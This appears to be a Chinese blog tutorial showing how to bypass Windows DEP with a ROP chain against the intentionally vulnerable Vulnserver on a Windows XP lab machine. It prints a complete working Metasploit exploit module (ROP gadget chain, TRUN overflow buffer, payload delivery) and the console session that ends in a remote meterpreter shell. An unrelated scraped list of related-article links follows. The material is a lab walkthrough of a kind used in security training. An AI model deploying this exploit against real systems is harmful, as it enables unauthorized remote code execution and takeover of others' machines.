转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86522445

攻击机 Kali 192.168.109.137

靶机 WinXP 192.168.109.141 (也可为其他Win系统,设置为DEP保护)

应用程序 Vulnserver(可以到链接: https://download.csdn.net/download/l1028386804/10921905 下载)

1.将靶机设置DEP保护

数据执行保护(Data Execution Prevention,DEP)是一种将特定内存区域标记为不可执行的保护机制,这种机制会导致我们在渗透过程中无法执行ShellCode。因此,即使我们可以改写EIP寄存器中的内容并成功地将ESP指向了ShellCode的起始地址,也无法执行攻击载荷。这是因为DEP的存在组织了内存中可写区域(例如栈和堆)中数据的执行。在这种情况下,我们必须使用可执行区域中的现存指令实现预期的功能——可以通过将所有的可执行指令放置成一个可以让跳转跳到ShellCode的顺序来实现这一目的。

绕过DEP的技术被称为返回导向编程(Return Oriented Programming,ROP)技术,它不同于通过覆盖改写EIP内容,并跳转到ShellCode栈溢出的普通方法。当DEP启用之后,我们将无法使用这种技术,因为栈中的数据是不能执行的。因此我们不再跳转到ShellCode,而是调用第一个ROP指令片段(gadget)。这些指令片段共同构成一个链式结构,一个指令片段会返回下一个指令片段,而不执行栈中的任何代码。

具体操作如下:

右键"我的电脑"->属性->高级->性能设置->数据执行保存->选择“为除下列选定程序之外的所有程序和服务启用DEP (U)”->确定

2.开启Vlunserver监听

在靶机的命令行中切换到vlunserver.exe所在的目录,执行如下命令

vlunserver.exe 9999

监听9999端口

3.开启ImmunityDebugger

4.将Vulnserver进程加载到ImmunityDebugger

依次选择ImmunityDebugger的File->Attach

显示靶机所有进程的信息

我们选中Vulnserver进程并单击右下角的Attach按钮

显示Vulnserver进程的运行信息

此时看到Vulnserver进程处于暂停状态,我们需要点击ImmunityDebugger的Play按钮

此时,看到Vulnserver处于运行状态

5.查找Vulnserver运行时加载的所有DLL信息

在ImmunityDebugger的命令行输入如下命令:

!mona modules

6.将msvcrt.dll上传到Kali的/root目录下

这里我们将靶机的C:\Windows\system32\msvcrt.dll上传到Kali的/root目录下。

7.查找ROP指令片段

这里,我们使用到的工具是Metasploit的msfrop,在Kali的命令行输入:

msfconsole
msfrop -v -s "pop cex" /root/msvcrt.dll

输出太多,这里只截取一部分:

8.创建ROP链

在ImmunityDebugger命令行输入如下命令:

!mona rop -m *.dll -cp nonull

执行后会在ImmunityDebugger安装目录下生成一个rop_chains.txt文件

我们打开rop_chains.txt文件,找到如下代码片段:

def create_rop_chain()# rop chain generated with mona.py - www.corelan.berop_gadgets = [0x77bfc038,  # POP ECX # RETN [msvcrt.dll] 0x6250609c,  # ptr to &VirtualProtect() [IAT essfunc.dll]0x77d5373d,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 0x7c96d192,  # XCHG EAX,ESI # RETN [ntdll.dll] 0x77c11c54,  # POP EBP # RETN [msvcrt.dll] 0x625011bb,  # & jmp esp [essfunc.dll]0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 0xfffffdff,  # Value to negate, will become 0x000002010x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 0x77dc560a,  # XCHG EAX,EBX # RETN [ADVAPI32.dll] 0x77f01564,  # POP EAX # RETN [GDI32.dll] 0xffffffc0,  # Value to negate, will become 0x000000400x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 0x77ef24c8,  # XCHG EAX,EDX # RETN [GDI32.dll] 0x77c0eb4f,  # POP ECX # RETN [msvcrt.dll] 0x7c99f17e,  # &Writable location [ntdll.dll]0x77c17641,  # POP EDI # RETN [msvcrt.dll] 0x77e6d224,  # RETN (ROP NOP) [RPCRT4.dll]0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 0x90909090,  # nop0x60fe4479,  # PUSHAD # RETN [hnetcfg.dll] ].flatten.pack("V*")return rop_gadgetsend

之后,将这段代码拷贝到我们自己编写的渗透模块中。

9.编写绕过DEP的Metasploit模块脚本dep_attack_by_binghe.rb

不多说,直接上代码:

##
# Author 冰河
# Date 2019-01-16
# Description Metasploit绕过DEP
##require 'msf/core'
class Metasploit3 < Msf::Exploit::RemoteRank = NormalRankinginclude Msf::Exploit::Remote::Tcpdef initialize(info = {})super(update_info(info,'Name'           => 'DEP Bypass Exploit','Description'    => %q{DEP Bypass Using ROP Chains Example Module},'Platform'       => 'Windows','Author'         => ['binghe'],'Payload'        =>{'space'     => 312,'BadChars'  => "\x00"},'Targets'      => [['Windows XP', {'Offset'  => 2006}]],'DisclosureDate'  => '2019-01-16'))register_options([Opt::RPORT(9999)],self.class)enddef create_rop_chain()# rop chain generated with mona.py - www.corelan.berop_gadgets = [0x77bfc038,  # POP ECX # RETN [msvcrt.dll] 0x6250609c,  # ptr to &VirtualProtect() [IAT essfunc.dll]0x77d5373d,  # MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll] 0x7c96d192,  # XCHG EAX,ESI # RETN [ntdll.dll] 0x77c11c54,  # POP EBP # RETN [msvcrt.dll] 0x625011bb,  # & jmp esp [essfunc.dll]0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 0xfffffdff,  # Value to negate, will become 0x000002010x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 0x77dc560a,  # XCHG EAX,EBX # RETN [ADVAPI32.dll] 0x77f01564,  # POP EAX # RETN [GDI32.dll] 0xffffffc0,  # Value to negate, will become 0x000000400x77e6d222,  # NEG EAX # RETN [RPCRT4.dll] 0x77ef24c8,  # XCHG EAX,EDX # RETN [GDI32.dll] 0x77c0eb4f,  # POP ECX # RETN [msvcrt.dll] 0x7c99f17e,  # &Writable location [ntdll.dll]0x77c17641,  # POP EDI # RETN [msvcrt.dll] 0x77e6d224,  # RETN (ROP NOP) [RPCRT4.dll]0x77c04fcd,  # POP EAX # RETN [msvcrt.dll] 0x90909090,  # nop0x60fe4479,  # PUSHAD # RETN [hnetcfg.dll] ].flatten.pack("V*")return rop_gadgetsenddef exploitconnectrop_chain = create_rop_chain()junk = rand_text_alpha_upper(target['Offset'])buf = "TRUN ." + junk + rop_chain + make_nops(16) + payload.encoded + '\r\n'sock.put(buf)handlerdisconnectendend

其中,def create_rop_chain()方法就是从第8步创建的rop_chains.txt文件中复制来的。

10.上传脚本dep_attack_by_binghe.rb

将脚本dep_attack_by_binghe.rb上传到Kali的/usr/share/metasploit-framework/modules/exploits/windows/masteringmetasploit目录下。

11.关闭ImmunityDebugger重新启动Vulnserver

在靶机上关闭ImmunityDebugger并重新启动Vulnserver。

12.在Kali上执行

msfconsole
use exploit/windows/masteringmetasploit/dep_attack_by_binghe
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.109.141
show options
exploit
ifconfig

具体操作如下:

msf > use exploit/windows/masteringmetasploit/dep_attack_by_binghe
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) > set RHOST 192.168.109.141
RHOST => 192.168.109.141
msf exploit(windows/masteringmetasploit/dep_attack_by_binghe) > show optionsModule options (exploit/windows/masteringmetasploit/dep_attack_by_binghe):Name   Current Setting  Required  Description----   ---------------  --------  -----------RHOST  192.168.109.141  yes       The target addressRPORT  9999             yes       The target port (TCP)Payload options (windows/meterpreter/bind_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)LPORT     4444             yes       The listen portRHOST     192.168.109.141  no        The target addressExploit target:Id  Name--  ----0   Windows XPmsf exploit(windows/masteringmetasploit/dep_attack_by_binghe) > exploit[*] Started bind TCP handler against 192.168.109.141:4444
[*] Sending stage (179779 bytes) to 192.168.109.141meterpreter > ifconfigInterface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1Interface 65539
============
Name         : VMware Accelerated AMD PCNet Adapter
Hardware MAC : 00:0c:29:5d:8e:d4
MTU          : 1500
IPv4 Address : 192.168.109.141
IPv4 Netmask : 255.255.255.0Interface 65540
============
Name         : Bluetooth �)%
Hardware MAC : 3c:a0:67:1a:fe:b4
MTU          : 1500meterpreter >

成功拿到Meterpreter的Shell。所以,设置系统的DEP保护,对我们来说并没有什么卵用。

渗透之——使用Metasploit编写绕过DEP渗透模块相关推荐

  1. [系统安全] 四十五.APT系列(10)Metasploit后渗透技术信息收集、权限提权和功能模块详解

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  2. 渗透测试 ( 3 ) --- Metasploit Framework ( MSF )

    白嫖 :https://zhuanlan.zhihu.com/p/449836479 :http://t.zoukankan.com/hxlinux-p-15787814.html :https:// ...

  3. 【关注观星公众号】渗透系列之POC编写之刷分大法

    一.前言:POC&EXP 什么是POC:即Proof of Concept,是业界流行的针对客户具体应用的验证性测试,根据用户对采用系统提出的性能要求和扩展需求的指标,在选用服务器上进行真实数 ...

  4. 26学习渗透测试工具 Metasploit 的基本用法,包括漏洞扫描、攻击模块

    Metasploit是一款广泛使用的渗透测试工具,它提供了大量的漏洞扫描.攻击模块和负载等,可以用于评估系统的安全性.下面是Metasploit的基本用法教程,包括漏洞扫描和攻击模块的使用. 漏洞扫描 ...

  5. 【愚公系列】2023年05月 网络安全高级班 079.Kali LinuxMetasploit渗透测试(Metasploit漏洞利用阶段)

    文章目录 前言 一.Metasploit实战 1.漏洞利用阶段 1.1 网络服务攻击 1.1.1 MS12-020(Windows服务) 1.1.2 MS08-067(Windows服务) 1.1.3 ...

  6. 内网渗透-Metasploit之——基本后渗透命令

    Metasploit之--基本后渗透命令 文章目录 Metasploit之--基本后渗透命令 前言 1.帮助菜单 2.后渗透命令 3.机器ID和UUID命令 4.通信信道的操作 5.获取用户名和进程信 ...

  7. 【愚公系列】2023年05月 网络安全高级班 077.Kali LinuxMetasploit渗透测试(Metasploit介绍)

    文章目录 一.Metasploit介绍 1.什么是Metasploit 2.Metasploit的组成 3.Metasploit的基本使用流程 二.基本渗透测试流程 1.攻击流程 2.渗透测试工具介绍 ...

  8. [网络安全自学篇] 五十五.Windows系统安全之构建ROP链绕过DEP及原理详解

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或 ...

  9. 利用WPN与ROP绕过DEP保护机制

    利用WPN与ROP绕过DEP保护机制 作者:Sud0 译者:riusksk (泉哥:http://riusksk.blogbus.com) 前言 对于本教程,假设读者具备以下条件: 1. 在电脑拥有各 ...

最新文章

  1. R语言使用xgboost构建回归模型:vtreat包为xgboost回归模型进行数据预处理(缺失值填充、缺失值标识、离散变量独热onehot编码)、构建出生体重的xgboost模型回归模型
  2. Python 进阶_闭包 装饰器
  3. 【C++】 C++标准模板库(一) Vector
  4. 这么简单的bug,你改了2天?
  5. php 获取mac地址栏,php 获取网卡物理(MAC)地址的实现方法
  6. 微信小程序自带地图_微信小程序之map地图
  7. 3、electron打包生成exe文件
  8. nginx+Git 404 error 错误处理
  9. paip.关于动画特效原理 html js 框架总结
  10. 计算机二级C语言程序设计 第一章 程序设计基本概念
  11. CSS font-family 属性值大全
  12. 重装系统(用U盘+wepe)
  13. java前后端分离(增删查改)
  14. python requests爬网页加速
  15. 我市“一卡通”被授予国家金卡工程优秀应用成果奖
  16. 《全面解读IPTV生态链》-转自CSDN
  17. 如何在 Ubuntu 上配置 ROS和LPMS IMU传感器
  18. python 文本文件中去重复
  19. AUTOSAR MCAL解析: ADC
  20. 磨金石教育分享||想转行学习插画,应该怎么做,需要什么基础?

热门文章

  1. 三分钟简单阐释计算机发展史,致写文案的你:三分钟快速看完这本书的精髓
  2. Opencv 提取水平 垂直线,去除杂线,提取对象
  3. 微信小程序 诡异的异步调用问题,函数执行结果与预想不一致
  4. 这5个免费音效素材网站,你一定要收藏好~
  5. 出国旅游也能用微信买单了
  6. 解决nodemon : 无法加载文件 C:\Users\admin\AppData\Roaming\npm\nodemon.ps1
  7. 【已更新】万能门店小程序独立版V5.1二开完整版 无限DIY+不限制小程序生成数量+数10款插件
  8. 2020011030王紫薇
  9. 【梁小国】教你怎么签自己的名字
  10. linux上tftp上传文件失败,Linux下tftp上传文件失败的几条原因